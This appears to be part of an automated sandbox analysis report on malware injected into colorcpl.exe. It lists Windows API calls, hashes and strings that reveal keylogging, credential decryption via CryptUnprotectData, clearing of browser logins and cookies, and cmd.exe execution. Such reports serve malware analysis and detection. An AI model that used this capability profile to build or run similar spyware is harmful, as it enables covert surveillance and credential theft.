                                        • Opcode Fuzzy Hash: 55122e2d23f81df8cda05c96327ccd3d5cb204916b1047da7ddda3a73c673bd5
                                        • Instruction Fuzzy Hash: 94014932E457207BA7822A356D8892B2669DBD5578721852CF82792180EF69BC425760
                                        APIs
                                        • _free.LIBCMT ref: 04ACDBB4
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACDBC6
                                        • _free.LIBCMT ref: 04ACDBD8
                                        • _free.LIBCMT ref: 04ACDBEA
                                        • _free.LIBCMT ref: 04ACDBFC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 96f5488fa8e0ad148298b7e8139380f3d895ccd0c50820f417b8c61def74e9a1
                                        • Instruction ID: 14847aa1d191e4620c5d7801fcbd186c3e0848ad922f10ce0beacbf7af789739
                                        • Opcode Fuzzy Hash: 96f5488fa8e0ad148298b7e8139380f3d895ccd0c50820f417b8c61def74e9a1
                                        • Instruction Fuzzy Hash: 73F06D32509314ABAAE0EB69E289C1B73D9FB20724365C81DF49ADB500CF35FCD08B64
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                        • Instruction ID: e15c11a7460e9e04c85ea999cd75fce302148a422b58da7c2382d245f6482d25
                                        • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                        • Instruction Fuzzy Hash: F7F096368042486BDAE0EB69F984C5A77DDAA45B20F751815F47CEFD00D770F880DA5C
                                        APIs
                                        • _free.LIBCMT ref: 04AC1566
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC1578
                                        • _free.LIBCMT ref: 04AC158B
                                        • _free.LIBCMT ref: 04AC159C
                                        • _free.LIBCMT ref: 04AC15AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ade881366a514a3e24310628b726e992f5e3c6e508803e5fed3c1c0698a74b55
                                        • Instruction ID: d50f5d520e1d854d5d0ca3c32792a0ea3d7333c68a662ca34856615f2e1af2e9
                                        • Opcode Fuzzy Hash: ade881366a514a3e24310628b726e992f5e3c6e508803e5fed3c1c0698a74b55
                                        • Instruction Fuzzy Hash: 98F01771806324AFDA816F26BA4540D3BA0F724734382C50AF87A9F654CB396E53AF80
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __dosmaperr
                                        • String ID: H
                                        • API String ID: 2332233096-2852464175
                                        • Opcode ID: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                        • Instruction ID: 981c9c7d34c0fcbc8875683d089624c810c6eb5a2ebb116d2c9b38cf2bb93193
                                        • Opcode Fuzzy Hash: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                        • Instruction Fuzzy Hash: B5A16732A201258FDF59EF78DC91BAE7BA4EB46320F2401A9EC11DF295D7358816CB51
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 04A924AD
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 04A924DC
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 04A9257C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]
                                        • API String ID: 3554306468-4262303796
                                        • Opcode ID: 51ee3182b961d9464882b3703685b4d0101aedcc7cb45d3fe100c2573d9381ce
                                        • Instruction ID: 29f5db440b90eddd3493e8e033833f56e57be7230398bff8e31cdf9aa44eb6c7
                                        • Opcode Fuzzy Hash: 51ee3182b961d9464882b3703685b4d0101aedcc7cb45d3fe100c2573d9381ce
                                        • Instruction Fuzzy Hash: CC510F72900119AAEB11EBD4DD91EEEB7BDEF04304F1005A9E505A6190EF70BA49CBA0
                                        APIs
                                        • _strpbrk.LIBCMT ref: 04ACB918
                                        • _free.LIBCMT ref: 04ACBA35
                                          • Part of subcall function 04AB9AA3: IsProcessorFeaturePresent.KERNEL32(00000017,04AB9A75,04A8E1EC,?,?,00000000,04A8E1EC,00000000,?,?,04AB9A95,00000000,00000000,00000000,00000000,00000000), ref: 04AB9AA5
                                          • Part of subcall function 04AB9AA3: GetCurrentProcess.KERNEL32(C0000417,pth_unenc,04A8E1EC), ref: 04AB9AC7
                                          • Part of subcall function 04AB9AA3: TerminateProcess.KERNEL32(00000000), ref: 04AB9ACE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction ID: 8951f446faa8a89890e4975ef53a922e1fba69467a71b8c6789cc56c7a8535ed
                                        • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction Fuzzy Hash: 24519175E00209AFDF14CFA8D881AADB7F5EF48314F24816DD854E7341E776BA018B60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 3300345361-3972193922
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 04AC0975
                                        • _free.LIBCMT ref: 04AC0A40
                                        • _free.LIBCMT ref: 04AC0A4A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                        • API String ID: 2506810119-1707929182
                                        APIs
                                          • Part of subcall function 04A92006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,04AF2248,04AF1FFC), ref: 04A92030
                                          • Part of subcall function 04A92006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 04A9204B
                                          • Part of subcall function 04A92006: RegCloseKey.ADVAPI32(00000000), ref: 04A92054
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                        • _wcslen.LIBCMT ref: 04A99744
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                        • String ID: .exe$program files (x86)\$program files\
                                        • API String ID: 37874593-1203593143
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,04A89305,?,00000000,00000000), ref: 04A8928B
                                        • CreateThread.KERNEL32(00000000,00000000,04A892EF,?,00000000,00000000), ref: 04A8929B
                                        • CreateThread.KERNEL32(00000000,00000000,04A89311,?,00000000,00000000), ref: 04A892A7
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        APIs
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 04A89EB7
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 04A89EC3
                                        • CreateThread.KERNEL32(00000000,00000000,04A8931D,?,00000000,00000000), ref: 04A89ECF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,04A86039,?), ref: 04A86090
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A86097
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: CryptUnprotectData$crypt32
                                        • API String ID: 2574300362-2380590389
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,04A85139), ref: 04A85153
                                        • CloseHandle.KERNEL32(?), ref: 04A851AA
                                        • SetEvent.KERNEL32(?), ref: 04A851B9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8D25E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Exception@8Throw
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 2005118841-1866435925
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 04A9487B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ExecuteShell
                                        • String ID: /C $cmd.exe$open
                                        • API String ID: 587946157-3896048727
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,04AF2248,04AF1FFC), ref: 04A92030
                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 04A9204B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 04A92054
                                        Strings
                                        • http\shell\open\command, xrefs: 04A92026
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseOpenQueryValue
                                        • String ID: http\shell\open\command
                                        • API String ID: 3677997916-1487954565
                                        APIs
                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,04AF21E8), ref: 04A9220F
                                        • RegSetValueExW.ADVAPI32(04AF2200,00000000,00000000,?,00000000,00000000,04AF2200,?,?,00000001), ref: 04A9223E
                                        • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 04A92249
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8C9D9
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 04A8CA18
                                          • Part of subcall function 04AB33ED: _Yarn.LIBCPMT ref: 04AB340C
                                          • Part of subcall function 04AB33ED: _Yarn.LIBCPMT ref: 04AB3430
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8CA3E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                        • String ID: bad locale name
                                        • API String ID: 3628047217-1405518554
                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 04A814A1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A814A8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,04AF1EE8), ref: 04A84D93
                                        • CreateThread.KERNEL32(00000000,00000000,?,04AF1E90,00000000,00000000), ref: 04A84DA7
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 04A84DB2
                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 04A84DBB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3360349984-0
                                        Strings
                                        • Cleared browsers logins and cookies., xrefs: 04A8B036
                                        • [Cleared browsers logins and cookies.], xrefs: 04A8B025
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Sleep
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                        • API String ID: 3472027048-1236744412
                                        APIs
                                          • Part of subcall function 04A9A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A9A2EB
                                          • Part of subcall function 04A9A2DB: GetWindowTextLengthW.USER32(00000000), ref: 04A9A2F4
                                          • Part of subcall function 04A9A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 04A9A31E
                                        • Sleep.KERNEL32(000001F4), ref: 04A8955A
                                        • Sleep.KERNEL32(00000064), ref: 04A895F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Window$SleepText$ForegroundLength
                                        • String ID: [ $ ]
                                        • API String ID: 3309952895-93608704
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,04A89745), ref: 04A896A3
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,04A89745), ref: 04A896B2
                                        • Sleep.KERNEL32(00002710,?,?,?,04A89745), ref: 04A896DF
                                        • CloseHandle.KERNEL32(00000000,?,?,?,04A89745), ref: 04A896E6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID:
                                        • API String ID: 1958988193-0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue), ref: 04AC5AC7
                                        • GetLastError.KERNEL32(?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue,04ADC110,04ADC118,00000000,00000364,?,04AC57F7), ref: 04AC5AD3
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue,04ADC110,04ADC118,00000000), ref: 04AC5AE1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 04A9A23C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04A9A261
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A26F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 3919263394-0
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 04AB761A
                                          • Part of subcall function 04AB7C52: ___AdjustPointer.LIBCMT ref: 04AB7C9C
                                        • _UnwindNestedFrames.LIBCMT ref: 04AB7631
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 04AB7643
                                        • CallCatchBlock.LIBVCRUNTIME ref: 04AB7667
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 069083DF
                                          • Part of subcall function 06908A17: ___AdjustPointer.LIBCMT ref: 06908A61
                                        • _UnwindNestedFrames.LIBCMT ref: 069083F6
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 06908408
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0690842C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        APIs
                                        • GetSystemMetrics.USER32(0000004C), ref: 04A973AA
                                        • GetSystemMetrics.USER32(0000004D), ref: 04A973B0
                                        • GetSystemMetrics.USER32(0000004E), ref: 04A973B6
                                        • GetSystemMetrics.USER32(0000004F), ref: 04A973BC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04AB6CD1
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04AB6CD6
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04AB6CDB
                                          • Part of subcall function 04AB81DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 04AB81EB
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04AB6CF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 06907A96
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 06907A9B
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 06907AA0
                                          • Part of subcall function 06908F9F: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 06908FB0
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 06907AB5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 068D9158
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068D91F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: Exception@8H_prologThrow
                                        • String ID: OE
                                        • API String ID: 3222999186-2506519113
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 068D648B
                                        • __Init_thread_footer.LIBCMT ref: 068D64C8
                                          • Part of subcall function 069032EA: __onexit.LIBCMT ref: 069032F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
